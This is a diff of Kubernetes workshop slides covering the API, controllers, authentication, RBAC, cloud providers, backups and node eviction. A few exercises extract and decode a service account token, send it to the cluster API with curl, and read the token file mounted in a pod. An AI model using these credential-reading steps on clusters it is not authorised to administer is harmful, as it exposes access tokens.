||||
|
||||
(note: the [k3s](https://k3s.io/) project allows us to use sqlite instead of etcd)
|
||||
|
||||
---
|
||||
|
||||
## Let's experiment a bit!
|
||||
|
||||
- For the exercises in this section, you'll be using `kubectl` locally and connecting to an AKS cluster
|
||||
|
||||
.exercise[
|
||||
|
||||
- Get cluster info
|
||||
```bash
|
||||
kubectl cluster-info
|
||||
```
|
||||
- Check that the cluster is operational:
|
||||
```bash
|
||||
kubectl get nodes
|
||||
```
|
||||
|
||||
- All nodes should be `Ready`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create
|
||||
|
||||
- Let's create a simple object
|
||||
|
||||
.exercise[
|
||||
|
||||
- List existing namespaces:
|
||||
```bash
|
||||
kubectl get ns
|
||||
```
|
||||
|
||||
- Create a new namespace with the following command:
|
||||
```bash
|
||||
kubectl create -f- <<EOF
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: hello
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
This is equivalent to `kubectl create namespace hello`.
|
||||
|
||||
---
|
||||
|
||||
## Read
|
||||
|
||||
- Let's retrieve the object we just created
|
||||
|
||||
.exercise[
|
||||
|
||||
- Read back our object:
|
||||
```bash
|
||||
kubectl get namespace hello -o yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We see a lot of data that wasn't here when we created the object.
|
||||
|
||||
Some data was automatically added to the object (like `spec.finalizers`).
|
||||
|
||||
Some data is dynamic (typically, the content of `status`.)
|
||||
|
||||
---
|
||||
|
||||
## API requests and responses
|
||||
|
||||
- Almost every Kubernetes API payload (requests and responses) has the same format:
|
||||
```yaml
|
||||
apiVersion: xxx
|
||||
kind: yyy
|
||||
metadata:
|
||||
name: zzz
|
||||
(more metadata fields here)
|
||||
(more fields here)
|
||||
```
|
||||
|
||||
- The fields shown above are mandatory, except for some special cases
|
||||
|
||||
(e.g.: in lists of resources, the list itself doesn't have a `metadata.name`)
|
||||
|
||||
- We show YAML for convenience, but the API uses JSON
|
||||
|
||||
(with optional protobuf encoding)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## API versions
|
||||
|
||||
- The `apiVersion` field corresponds to an *API group*
|
||||
|
||||
- It can be either `v1` (aka the "core" or "legacy" group), or `group/version`; e.g.:
|
||||
|
||||
- `apps/v1`
|
||||
- `rbac.authorization.k8s.io/v1`
|
||||
- `extensions/v1beta1`
|
||||
|
||||
- It does not indicate which version of Kubernetes we're talking about
|
||||
|
||||
- It *indirectly* indicates the version of the `kind`
|
||||
|
||||
(which fields exist, their format, which ones are mandatory...)
|
||||
|
||||
- A single resource type (`kind`) is rarely versioned alone
|
||||
|
||||
(e.g.: the `batch` API group contains `jobs` and `cronjobs`)
|
||||
|
||||
---
|
||||
|
||||
## Update
|
||||
|
||||
- Let's update our namespace object
|
||||
|
||||
- There are many ways to do that, including:
|
||||
|
||||
- `kubectl apply` (and provide an updated YAML file)
|
||||
- `kubectl edit`
|
||||
- `kubectl patch`
|
||||
- many helpers, like `kubectl label`, or `kubectl set`
|
||||
|
||||
- In each case, `kubectl` will:
|
||||
|
||||
- get the current definition of the object
|
||||
- compute changes
|
||||
- submit the changes (with `PATCH` requests)
|
||||
|
||||
---
|
||||
|
||||
## Adding a label
|
||||
|
||||
- For demonstration purposes, let's add a label to the namespace
|
||||
|
||||
- The easiest way is to use `kubectl label`
|
||||
|
||||
.exercise[
|
||||
|
||||
- In one terminal, watch namespaces:
|
||||
```bash
|
||||
kubectl get namespaces --show-labels -w
|
||||
```
|
||||
|
||||
- In the other, update our namespace:
|
||||
```bash
|
||||
kubectl label namespaces hello color=purple
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We demonstrated *update* and *watch* semantics.
|
||||
|
||||
---
|
||||
|
||||
## What's special about *watch*?
|
||||
|
||||
- The API server itself doesn't do anything: it's just a fancy object store
|
||||
|
||||
- All the actual logic in Kubernetes is implemented with *controllers*
|
||||
|
||||
- A *controller* watches a set of resources, and takes action when they change
|
||||
|
||||
- Examples:
|
||||
|
||||
- when a Pod object is created, it gets scheduled and started
|
||||
|
||||
- when a Pod belonging to a ReplicaSet terminates, it gets replaced
|
||||
|
||||
- when a Deployment object is updated, it can trigger a rolling update
|
||||
|
||||
---
|
||||
|
||||
# Other control plane components
|
||||
|
||||
- API server ✔️
|
||||
|
||||
- etcd ✔️
|
||||
|
||||
- Controller manager
|
||||
|
||||
- Scheduler
|
||||
|
||||
---
|
||||
|
||||
## Controller manager
|
||||
|
||||
- This is a collection of loops watching all kinds of objects
|
||||
|
||||
- That's where the actual logic of Kubernetes lives
|
||||
|
||||
- When we create a Deployment (e.g. with `kubectl run web --image=nginx`),
|
||||
|
||||
- we create a Deployment object
|
||||
|
||||
- the Deployment controller notices it, and creates a ReplicaSet
|
||||
|
||||
- the ReplicaSet controller notices the ReplicaSet, and creates a Pod
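We can observe that chain directly (a quick sketch; `kubectl create deployment` is used here instead of `kubectl run`, since the latter creates a bare pod in recent kubectl versions):

```bash
kubectl create deployment web --image=nginx
kubectl get deployments,replicasets,pods
```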
|
||||
|
||||
---
|
||||
|
||||
## Scheduler
|
||||
|
||||
- When a pod is created, it is in `Pending` state
|
||||
|
||||
- The scheduler (or rather: *a scheduler*) must bind it to a node
|
||||
|
||||
- Kubernetes comes with an efficient scheduler with many features
|
||||
|
||||
- if we have special requirements, we can add another scheduler
|
||||
<br/>
|
||||
(example: this [demo scheduler](https://github.com/kelseyhightower/scheduler) uses the cost of nodes, stored in node annotations)
|
||||
|
||||
- A pod might stay in `Pending` state for a long time:
|
||||
|
||||
- if the cluster is full
|
||||
|
||||
- if the pod has special constraints that can't be met
|
||||
|
||||
- if the scheduler is not running (!)
|
||||
@@ -356,9 +356,9 @@ We demonstrated *update* and *watch* semantics.
|
||||
|
||||
- we create a Deployment object
|
||||
|
||||
- the Deployment controller notices it, and creates a ReplicaSet
|
||||
- the Deployment controller notices it, creates a ReplicaSet
|
||||
|
||||
- the ReplicaSet controller notices the ReplicaSet, and creates a Pod
|
||||
- the ReplicaSet controller notices it, creates a Pod
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -1,319 +0,0 @@
|
||||
# Authentication and authorization
|
||||
|
||||
*And first, a little refresher!*
|
||||
|
||||
- Authentication = verifying the identity of a person
|
||||
|
||||
On a UNIX system, we can authenticate with login+password, SSH keys ...
|
||||
|
||||
- Authorization = listing what they are allowed to do
|
||||
|
||||
On a UNIX system, this can include file permissions, sudoer entries ...
|
||||
|
||||
- Sometimes abbreviated as "authn" and "authz"
|
||||
|
||||
- In good modular systems, these things are decoupled
|
||||
|
||||
(so we can e.g. change a password or SSH key without having to reset access rights)
|
||||
|
||||
---
|
||||
|
||||
## Authentication in Kubernetes
|
||||
|
||||
- When the API server receives a request, it tries to authenticate it
|
||||
|
||||
(it examines headers, certificates... anything available)
|
||||
|
||||
- Many authentication methods are available and can be used simultaneously
|
||||
|
||||
(we will see them on the next slide)
|
||||
|
||||
- It's the job of the authentication method to produce:
|
||||
|
||||
- the user name
|
||||
- the user ID
|
||||
- a list of groups
|
||||
|
||||
- The API server doesn't interpret these; that'll be the job of *authorizers*
|
||||
|
||||
---
|
||||
|
||||
## Authentication methods
|
||||
|
||||
- TLS client certificates
|
||||
|
||||
(that's what we've been doing with `kubectl` so far)
|
||||
|
||||
- Bearer tokens
|
||||
|
||||
(a secret token in the HTTP headers of the request)
|
||||
|
||||
- [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
|
||||
|
||||
(carrying user and password in an HTTP header)
|
||||
|
||||
- Authentication proxy
|
||||
|
||||
(sitting in front of the API and setting trusted headers)
|
||||
|
||||
---
|
||||
|
||||
## Anonymous & unauthenticated requests
|
||||
|
||||
- If any authentication method *rejects* a request, it's denied
|
||||
|
||||
(`401 Unauthorized` HTTP code)
|
||||
|
||||
- If a request is neither rejected nor accepted by anyone, it's anonymous
|
||||
|
||||
- the user name is `system:anonymous`
|
||||
|
||||
- the list of groups is `[system:unauthenticated]`
|
||||
|
||||
- By default, the anonymous user can't do anything
|
||||
|
||||
|
||||
.exercise[
|
||||
|
||||
- Note that 401 (not 403) is what you get if you just `curl` the Kubernetes API
|
||||
```bash
|
||||
curl -k $API_URL
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Authentication with tokens
|
||||
|
||||
- Tokens are passed as HTTP headers:
|
||||
|
||||
`Authorization: Bearer and-then-here-comes-the-token`
|
||||
|
||||
- Tokens can be validated through a number of different methods:
|
||||
|
||||
- static tokens hard-coded in a file on the API server
|
||||
|
||||
- [bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) (special case to create a cluster or join nodes)
|
||||
|
||||
- [OpenID Connect tokens](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#openid-connect-tokens) (to delegate authentication to compatible OAuth2 providers)
|
||||
|
||||
- service accounts (these deserve more details, coming right up!)
|
||||
|
||||
---
|
||||
|
||||
## Service accounts
|
||||
|
||||
- A service account is a user that exists in the Kubernetes API
|
||||
|
||||
(it is visible with e.g. `kubectl get serviceaccounts`)
|
||||
|
||||
- Service accounts can therefore be created / updated dynamically
|
||||
|
||||
(they don't require hand-editing a file and restarting the API server)
|
||||
|
||||
- A service account is associated with a set of secrets
|
||||
|
||||
(the kind that you can view with `kubectl get secrets`)
|
||||
|
||||
- Service accounts are generally used to grant permissions to applications, services...
|
||||
|
||||
(as opposed to humans)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Token authentication in practice
|
||||
|
||||
- We are going to list existing service accounts
|
||||
|
||||
- Then we will extract the token for a given service account
|
||||
|
||||
- And we will use that token to authenticate with the API
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Listing service accounts
|
||||
|
||||
.exercise[
|
||||
|
||||
- The resource name is `serviceaccount` or `sa` for short:
|
||||
```bash
|
||||
kubectl get sa
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
There should be just one service account in the default namespace: `default`.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Finding the secret
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the secrets for the `default` service account:
|
||||
```bash
|
||||
kubectl get sa default -o yaml
|
||||
SECRET=$(kubectl get sa default -o json | jq -r .secrets[0].name)
|
||||
echo $SECRET
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
It should be named `default-token-XXXXX`.
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Extracting the token
|
||||
|
||||
- The token is stored in the secret, wrapped with base64 encoding
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the secret:
|
||||
```bash
|
||||
kubectl get secret $SECRET -o yaml
|
||||
```
|
||||
|
||||
- Extract the token and decode it:
|
||||
```bash
|
||||
TOKEN=$(kubectl get secret $SECRET -o json \
|
||||
| jq -r .data.token | openssl base64 -d -A)
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Using the token
|
||||
|
||||
- Let's send a request to the API, without and with the token
|
||||
|
||||
.exercise[
|
||||
|
||||
- Find the URL for the `kubernetes` master:
|
||||
```bash
|
||||
kubectl cluster-info
|
||||
```
|
||||
- Or set it programmatically, if `AKS_NAME` is set (the cluster names can be found with `kubectl config view`):
|
||||
```bash
|
||||
API=$(kubectl config view -o \
|
||||
jsonpath="{.clusters[?(@.name==\"$AKS_NAME\")].cluster.server}")
|
||||
```
|
||||
- Connect without the token, then with the token:
|
||||
```bash
|
||||
curl -k $API
|
||||
curl -k -H "Authorization: Bearer $TOKEN" $API
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Authorization in Kubernetes
|
||||
|
||||
- There are multiple ways to grant permissions in Kubernetes, called [authorizers](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#authorization-modules):
|
||||
|
||||
- [Node Authorization](https://kubernetes.io/docs/reference/access-authn-authz/node/) (used internally by kubelet; we can ignore it)
|
||||
|
||||
- [Attribute-based access control](https://kubernetes.io/docs/reference/access-authn-authz/abac/) (powerful but complex and static; ignore it too)
|
||||
|
||||
- [Webhook](https://kubernetes.io/docs/reference/access-authn-authz/webhook/) (each API request is submitted to an external service for approval)
|
||||
|
||||
- [Role-based access control](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) (associates permissions to users dynamically)
|
||||
|
||||
- The one we want is the last one, generally abbreviated as RBAC
|
||||
|
||||
---
|
||||
|
||||
## Role-based access control
|
||||
|
||||
- RBAC allows us to specify fine-grained permissions
|
||||
|
||||
- Permissions are expressed as *rules*
|
||||
|
||||
- A rule is a combination of:
|
||||
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
|
||||
|
||||
- resources (as in "API resource," like pods, nodes, services...)
|
||||
|
||||
- resource names (to specify e.g. one specific pod instead of all pods)
|
||||
|
||||
- in some case, [subresources](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#referring-to-resources) (e.g. logs are subresources of pods)
|
||||
|
||||
---
|
||||
|
||||
## From rules to roles to rolebindings
|
||||
|
||||
- A *role* is an API object containing a list of *rules*
|
||||
|
||||
Example: role "external-load-balancer-configurator" can:
|
||||
- [list, get] resources [endpoints, services, pods]
|
||||
- [update] resources [services]
|
||||
|
||||
- A *rolebinding* associates a role with a user
|
||||
|
||||
Example: rolebinding "external-load-balancer-configurator":
|
||||
- associates user "external-load-balancer-configurator"
|
||||
- with role "external-load-balancer-configurator"
|
||||
|
||||
- Yes, there can be users, roles, and rolebindings with the same name
|
||||
|
||||
- It's a good idea for 1-1-1 bindings; not so much for 1-N ones
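Expressed as manifests, the example above might look like this (a sketch; the slide only gives the rules in prose, so the exact YAML is an assumption):

```yaml
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: external-load-balancer-configurator
rules:
# [list, get] on endpoints, services, pods
- apiGroups: [""]
  resources: ["endpoints", "services", "pods"]
  verbs: ["list", "get"]
# [update] on services
- apiGroups: [""]
  resources: ["services"]
  verbs: ["update"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: external-load-balancer-configurator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: external-load-balancer-configurator
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: external-load-balancer-configurator
```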
|
||||
|
||||
---
|
||||
|
||||
## Cluster-scope permissions
|
||||
|
||||
- API resources Role and RoleBinding are for objects within a namespace
|
||||
|
||||
- We can also define API resources ClusterRole and ClusterRoleBinding
|
||||
|
||||
- These are a superset, allowing us to:
|
||||
|
||||
- specify actions on cluster-wide objects (like nodes)
|
||||
|
||||
- operate across all namespaces
|
||||
|
||||
- We can create Role and RoleBinding resources within a namespace
|
||||
|
||||
- ClusterRole and ClusterRoleBinding resources are global
|
||||
|
||||
---
|
||||
|
||||
## Pods and service accounts
|
||||
|
||||
- A pod can be associated with a service account
|
||||
|
||||
- by default, it is associated with the `default` service account
|
||||
|
||||
- as we saw earlier, this service account has no permissions anyway
|
||||
|
||||
- The associated token is exposed to the pod's filesystem
|
||||
|
||||
(in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
|
||||
|
||||
- Standard Kubernetes tooling (like `kubectl`) will look for it there
|
||||
|
||||
- So Kubernetes tools running in a pod will automatically use the service account
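A quick way to see that token (replace `<some-pod>` with any running pod in the namespace):

```bash
kubectl exec <some-pod> -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token
```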
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Pod Security Policies
|
||||
|
||||
- If you'd like to check out pod-level controls in AKS, they are [available in preview](https://docs.microsoft.com/en-us/azure/aks/use-pod-security-policies)
|
||||
|
||||
- Experiment, but not in production!
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- When the API server receives a request, it tries to authenticate it
|
||||
|
||||
(it examines headers, certificates... anything available)
|
||||
(it examines headers, certificates ... anything available)
|
||||
|
||||
- Many authentication methods are available and can be used simultaneously
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
- the user ID
|
||||
- a list of groups
|
||||
|
||||
- The API server doesn't interpret these; that'll be the job of *authorizers*
|
||||
- The API server doesn't interpret these; it'll be the job of *authorizers*
|
||||
|
||||
---
|
||||
|
||||
@@ -50,7 +50,7 @@
|
||||
|
||||
- [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
|
||||
|
||||
(carrying user and password in an HTTP header)
|
||||
(carrying user and password in a HTTP header)
|
||||
|
||||
- Authentication proxy
|
||||
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
(i.e. they are not stored in etcd or anywhere else)
|
||||
|
||||
- Users can be created (and added to groups) independently of the API
|
||||
- Users can be created (and given membership to groups) independently of the API
|
||||
|
||||
- The Kubernetes API can be set up to use your custom CA to validate client certs
|
||||
|
||||
@@ -143,21 +143,19 @@ class: extra-details
|
||||
|
||||
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
|
||||
|
||||
- As a result, we don't have an easy way to terminate someone's access
|
||||
- As a result, we cannot easily suspend a user's access
|
||||
|
||||
(if their key is compromised, or they leave the organization)
|
||||
- There are workarounds, but they are very inconvenient:
|
||||
|
||||
- Option 1: re-create a new CA and re-issue everyone's certificates
|
||||
<br/>
|
||||
→ Maybe OK if we only have a few users; no way otherwise
|
||||
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
|
||||
|
||||
- Option 2: don't use groups; grant permissions to individual users
|
||||
<br/>
|
||||
→ Inconvenient if we have many users and teams; error-prone
|
||||
- re-create the CA and re-issue all certificates in case of compromise
|
||||
|
||||
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
|
||||
<br/>
|
||||
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
|
||||
- grant permissions to individual users, not groups
|
||||
<br/>
|
||||
(and remove all permissions to a compromised user)
|
||||
|
||||
- Until this is fixed, we probably want to use other methods
|
||||
|
||||
---
|
||||
|
||||
@@ -193,7 +191,7 @@ class: extra-details
|
||||
|
||||
(the kind that you can view with `kubectl get secrets`)
|
||||
|
||||
- Service accounts are generally used to grant permissions to applications, services...
|
||||
- Service accounts are generally used to grant permissions to applications, services ...
|
||||
|
||||
(as opposed to humans)
|
||||
|
||||
@@ -217,7 +215,7 @@ class: extra-details
|
||||
|
||||
.exercise[
|
||||
|
||||
- The resource name is `serviceaccount` or `sa` for short:
|
||||
- The resource name is `serviceaccount` or `sa` in short:
|
||||
```bash
|
||||
kubectl get sa
|
||||
```
|
||||
@@ -309,7 +307,7 @@ class: extra-details
|
||||
|
||||
- The API "sees" us as a different user
|
||||
|
||||
- But neither user has any rights, so we can't do nothin'
|
||||
- But neither user has any right, so we can't do nothin'
|
||||
|
||||
- Let's change that!
|
||||
|
||||
@@ -339,9 +337,9 @@ class: extra-details
|
||||
|
||||
- A rule is a combination of:
|
||||
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
|
||||
|
||||
- resources (as in "API resource," like pods, nodes, services...)
|
||||
- resources (as in "API resource", like pods, nodes, services ...)
|
||||
|
||||
- resource names (to specify e.g. one specific pod instead of all pods)
|
||||
|
||||
@@ -375,13 +373,13 @@ class: extra-details
|
||||
|
||||
- We can also define API resources ClusterRole and ClusterRoleBinding
|
||||
|
||||
- These are a superset, allowing us to:
|
||||
- These are a superset, allowing to:
|
||||
|
||||
- specify actions on cluster-wide objects (like nodes)
|
||||
|
||||
- operate across all namespaces
|
||||
|
||||
- We can create Role and RoleBinding resources within a namespace
|
||||
- We can create Role and RoleBinding resources within a namespaces
|
||||
|
||||
- ClusterRole and ClusterRoleBinding resources are global
|
||||
|
||||
@@ -389,13 +387,13 @@ class: extra-details
|
||||
|
||||
## Pods and service accounts
|
||||
|
||||
- A pod can be associated with a service account
|
||||
- A pod can be associated to a service account
|
||||
|
||||
- by default, it is associated with the `default` service account
|
||||
- by default, it is associated to the `default` service account
|
||||
|
||||
- as we saw earlier, this service account has no permissions anyway
|
||||
- as we've seen earlier, this service account has no permission anyway
|
||||
|
||||
- The associated token is exposed to the pod's filesystem
|
||||
- The associated token is exposed into the pod's filesystem
|
||||
|
||||
(in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
|
||||
|
||||
@@ -409,7 +407,7 @@ class: extra-details
|
||||
|
||||
- We are going to create a service account
|
||||
|
||||
- We will use a default cluster role (`view`)
|
||||
- We will use an existing cluster role (`view`)
|
||||
|
||||
- We will bind together this role and this service account
|
||||
|
||||
@@ -460,7 +458,7 @@ class: extra-details
|
||||
|
||||
]
|
||||
|
||||
It's important to note a couple of details in these flags...
|
||||
It's important to note a couple of details in these flags ...
|
||||
|
||||
---
|
||||
|
||||
@@ -493,13 +491,13 @@ It's important to note a couple of details in these flags...
|
||||
|
||||
- again, the command would have worked fine (no error)
|
||||
|
||||
- ...but our API requests would have been denied later
|
||||
- ... but our API requests would have been denied later
|
||||
|
||||
- What's about the `default:` prefix?
|
||||
|
||||
- that's the namespace of the service account
|
||||
|
||||
- yes, it could be inferred from context, but... `kubectl` requires it
|
||||
- yes, it could be inferred from context, but ... `kubectl` requires it
|
||||
|
||||
---
|
||||
|
||||
@@ -576,51 +574,6 @@ It's important to note a couple of details in these flags...
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where does this `view` role come from?
|
||||
|
||||
- Kubernetes defines a number of ClusterRoles intended to be bound to users
|
||||
|
||||
- `cluster-admin` can do *everything* (think `root` on UNIX)
|
||||
|
||||
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
|
||||
|
||||
- `edit` is similar to `admin`, but cannot view or edit permissions
|
||||
|
||||
- `view` has read-only access to most resources, except permissions and secrets
|
||||
|
||||
*In many situations, these roles will be all you need.*
|
||||
|
||||
*You can also customize them!*
|
||||
|
||||
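- To peek at what these roles contain (read-only commands):
  ```bash
  kubectl get clusterroles
  kubectl describe clusterrole view
  ```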
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Customizing the default roles
|
||||
|
||||
- If you need to *add* permissions to these default roles (or others),
|
||||
<br/>
|
||||
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
|
||||
|
||||
- This happens by creating a ClusterRole with the following labels:
|
||||
```yaml
|
||||
metadata:
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
```
|
||||
|
||||
- This ClusterRole's permissions will be added to `admin`/`edit`/`view` respectively
|
||||
|
||||
- This is particularly useful when using CustomResourceDefinitions
|
||||
|
||||
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where do our permissions come from?
|
||||
|
||||
- When interacting with the Kubernetes API, we are using a client certificate
|
||||
@@ -652,7 +605,7 @@ class: extra-details
|
||||
kubectl describe clusterrolebinding cluster-admin
|
||||
```
|
||||
|
||||
- This binding associates `system:masters` with the cluster role `cluster-admin`
|
||||
- This binding associates `system:masters` to the cluster role `cluster-admin`
|
||||
|
||||
- And `cluster-admin` is, basically, `root`:
|
||||
```bash
|
||||
@@ -667,7 +620,7 @@ class: extra-details
|
||||
|
||||
- For auditing purposes, sometimes we want to know who can perform an action
|
||||
|
||||
- There is a proof-of-concept tool by Aqua Security which does exactly that:
|
||||
- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
|
||||
|
||||
https://github.com/aquasecurity/kubectl-who-can
|
||||
|
||||
|
||||
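- Assuming the plugin is installed (e.g. through krew), usage looks roughly like this:
  ```bash
  kubectl who-can create deployments
  kubectl who-can get secrets --namespace kube-system
  ```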
@@ -20,15 +20,15 @@
|
||||
|
||||
- Configuring routing tables in the cloud network (specific to GCE)
|
||||
|
||||
- Updating node labels to indicate region, zone, instance type...
|
||||
- Updating node labels to indicate region, zone, instance type ...
|
||||
|
||||
- Obtaining the node name and internal/external addresses from the cloud metadata service
|
||||
|
||||
- Deleting nodes from Kubernetes when they're deleted in the cloud
|
||||
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks...)
|
||||
- Managing *some* volumes (e.g. ELBs, AzureDisks ...)
|
||||
|
||||
(Eventually, volumes will be managed by the Container Storage Interface)
|
||||
(Eventually, volumes will be managed by the CSI)
|
||||
|
||||
---
|
||||
|
||||
@@ -83,7 +83,7 @@ The list includes the following providers:
|
||||
|
||||
## Audience questions
|
||||
|
||||
- What kind of clouds are you using/planning to use?
|
||||
- What kind of clouds are you using / planning to use?
|
||||
|
||||
- What kind of details would you like to see in this section?
|
||||
|
||||
@@ -105,7 +105,7 @@ The list includes the following providers:
|
||||
|
||||
- When using managed clusters, this is done automatically
|
||||
|
||||
- There is very little documentation on writing the configuration file
|
||||
- There is very little documentation to write the configuration file
|
||||
|
||||
(except for OpenStack)
|
||||
|
||||
@@ -123,7 +123,7 @@ The list includes the following providers:
|
||||
|
||||
- To get these addresses, the node needs to communicate with the control plane
|
||||
|
||||
- ...Which means joining the cluster
|
||||
- ... Which means joining the cluster
|
||||
|
||||
(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
|
||||
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
- error recovery (human or process has altered or corrupted data)
|
||||
|
||||
- cloning environments (for testing, validation...)
|
||||
- cloning environments (for testing, validation ...)
|
||||
|
||||
- Let's see the strategies and tools available with Kubernetes!
|
||||
|
||||
@@ -18,13 +18,13 @@
|
||||
|
||||
(it gives us replication primitives)
|
||||
|
||||
- Kubernetes helps us clone / replicate environments
|
||||
- Kubernetes helps us to clone / replicate environments
|
||||
|
||||
(all resources can be described with manifests)
|
||||
|
||||
- Kubernetes *does not* help us with error recovery
|
||||
|
||||
- We still need to back up/snapshot our data:
|
||||
- We still need to backup / snapshot our data:
|
||||
|
||||
- with database backups (mysqldump, pgdump, etc.)
|
||||
|
||||
@@ -58,7 +58,7 @@
|
||||
|
||||
- If our deployment system isn't fully automated, it should at least be documented
|
||||
|
||||
- Litmus test: how long does it take to deploy a cluster...
|
||||
- Litmus test: how long does it take to deploy a cluster ...
|
||||
|
||||
- for a senior engineer?
|
||||
|
||||
@@ -66,7 +66,7 @@
|
||||
|
||||
- Does it require external intervention?
|
||||
|
||||
(e.g. provisioning servers, signing TLS certs...)
|
||||
(e.g. provisioning servers, signing TLS certs ...)
|
||||
|
||||
---
|
||||
|
||||
@@ -108,7 +108,7 @@
|
||||
|
||||
- For real applications: add resources (as YAML files)
|
||||
|
||||
- For applications deployed multiple times: Helm, Kustomize...
|
||||
- For applications deployed multiple times: Helm, Kustomize ...
|
||||
|
||||
(staging and production count as "multiple times")
|
||||
|
||||
|
||||
@@ -1,167 +0,0 @@
|
||||
# Cluster sizing
|
||||
|
||||
- What happens when the cluster gets full?
|
||||
|
||||
- How can we scale up the cluster?
|
||||
|
||||
- Can we do it automatically?
|
||||
|
||||
- What are other methods to address capacity planning?
|
||||
|
||||
---
|
||||
|
||||
## When are we out of resources?
|
||||
|
||||
- kubelet monitors node resources:
|
||||
|
||||
- memory
|
||||
|
||||
- node disk usage (typically the root filesystem of the node)
|
||||
|
||||
- image disk usage (where container images and RW layers are stored)
|
||||
|
||||
- For each resource, we can provide two thresholds:
|
||||
|
||||
- a hard threshold (if it is reached, it triggers immediate action)
|
||||
|
||||
- a soft threshold (triggers action only after a grace period)
|
||||
|
||||
- Resource thresholds and grace periods are configurable
|
||||
|
||||
(by passing kubelet command-line flags)
|
||||
|
||||
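- For example, the kubelet could be started with flags along these lines (the values are placeholders, not recommendations):
  ```bash
  kubelet ... \
    --eviction-hard=memory.available<500Mi,nodefs.available<10% \
    --eviction-soft=memory.available<1Gi \
    --eviction-soft-grace-period=memory.available=1m30s
  ```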
---
|
||||
|
||||
## What happens then?
|
||||
|
||||
- If disk usage is too high:
|
||||
|
||||
- kubelet will try to remove terminated pods
|
||||
|
||||
- then, it will try to *evict* pods
|
||||
|
||||
- If memory usage is too high:
|
||||
|
||||
- it will try to evict pods
|
||||
|
||||
- The node is marked as "under pressure"
|
||||
|
||||
- This temporarily prevents new pods from being scheduled on the node
|
||||
|
||||
---
|
||||
|
||||
## Which pods get evicted?
|
||||
|
||||
- kubelet looks at the pods' QoS and PriorityClass
|
||||
|
||||
- First, pods with BestEffort QoS are considered
|
||||
|
||||
- Then, pods with Burstable QoS exceeding their *requests*
|
||||
|
||||
    (but only when the resource they exceed is the one under pressure on the node)
|
||||
|
||||
- Finally, pods with Guaranteed QoS, and Burstable pods within their requests
|
||||
|
||||
- Within each group, pods are sorted by PriorityClass
|
||||
|
||||
- If there are pods with the same PriorityClass, they are sorted by usage excess
|
||||
|
||||
(i.e. the pods whose usage exceeds their requests the most are evicted first)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Eviction of Guaranteed pods
|
||||
|
||||
- *Normally*, pods with Guaranteed QoS should not be evicted
|
||||
|
||||
- A chunk of resources is reserved for node processes (like kubelet)
|
||||
|
||||
- It is expected that these processes won't use more than this reservation
|
||||
|
||||
- If they do use more resources anyway, all bets are off!
|
||||
|
||||
- If this happens, kubelet must evict Guaranteed pods to preserve node stability
|
||||
|
||||
(or Burstable pods that are still within their requested usage)
